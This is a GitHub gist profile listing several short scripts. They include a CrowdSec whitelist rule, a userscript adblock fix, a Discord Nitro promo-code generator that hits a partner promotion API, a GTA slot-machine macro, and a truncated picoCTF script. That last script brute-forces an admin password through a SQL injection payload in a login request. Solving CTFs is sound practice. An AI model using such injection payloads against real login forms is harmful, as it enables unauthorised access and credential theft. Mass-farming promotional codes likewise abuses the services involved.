Skip to content

Instantly share code, notes, and snippets.

View MikMik1011's full-sized avatar

Miša Stefanović MikMik1011

View GitHub Profile
@MikMik1011
MikMik1011 / immich-whitelist.yaml
Created June 22, 2025 13:38
Crowdsec whitelist for preventing false positives when Immich tries to load thumbnails
name: crowdsecurity/immich-whitelists
description: "Whitelist false positive from Immich-api"
filter: "evt.Meta.traefik_router_name == 'immich-server@docker'"
whitelist:
reason: "Whitelist false positive from Immich-api"
expression:
- evt.Meta.http_verb == 'GET' && evt.Meta.http_path matches '/api/assets/[a-f0-9\\-]+/thumbnail'
@MikMik1011
MikMik1011 / PMF ePortal AdBlock fix-1.0.user.js
Last active October 3, 2024 11:54
A Tampermonkey script which fixes the PMF ePortal not loading due to the 'piwik' module being blocked by adblockers.
// ==UserScript==
// @name PMF ePortal AdBlock fix
// @namespace https://misa.st
// @version 1.0
// @description Fix the PMF ePortal not loading due to the 'piwik' module being blocked by adblockers.
// @author MikMik
// @match https://eportal.pmf.uns.ac.rs/*
// @grant none
// @run-at document-start
// ==/UserScript==
@MikMik1011
MikMik1011 / gx_nitro.py
Created December 20, 2023 23:41
Discord Nitro Opera GX free generator
import requests
import tqdm
PROMOTION_ID = "1180231712274387115"
DISCORD_BASE_URL = "https://discord.com/billing/partner-promotions"
DISCORD_API_URL = "https://api.discord.gx.games/v1/direct-fulfillment"
def generate_nitro():
headers = {'content-type': 'application/json'}
data = {'partnerUserId': ''}
@MikMik1011
MikMik1011 / gta5macro.py
Created February 26, 2023 14:26
gta online slot machine macro
from pyautogui import press
from time import sleep
win = False
def spin():
print("vockice mi zivot upropastile")
press("enter")
sleep(10)
@MikMik1011
MikMik1011 / brute.py
Last active February 3, 2023 22:07
picoCTF SQLiLite admin password bruteforce script
import requests
import string
def sendReq(pattern):
url = "http://saturn.picoctf.net:50787/login.php"
resp = requests.post(url, {
"username": f"admin' AND password LIKE '{pattern}' -- -",
"password": "",
"debug": 0
}).text